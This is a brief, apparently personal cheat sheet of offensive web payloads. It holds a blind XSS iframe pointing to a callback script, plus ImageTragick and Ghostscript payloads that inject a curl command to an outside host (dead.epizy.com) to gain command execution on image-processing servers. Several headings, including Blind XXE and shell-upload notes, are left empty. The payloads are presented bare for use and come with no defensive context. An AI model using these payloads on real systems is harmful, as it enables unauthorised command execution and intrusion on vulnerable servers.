- Blind XSS :
<iframe src="http://example/Hunter.php?url=victim.com"></iframe>
- Blind XXE :
- ImageTragick :
push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'http://dead.epizy.com/1.php?x=%60curl http://dead.epizy.com/1.php' pop graphic-context
%!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%curl -XGET http://dead.epizy.com/1.php') currentdevice putdeviceprops
- While uploading a Shell and didn't get it's path :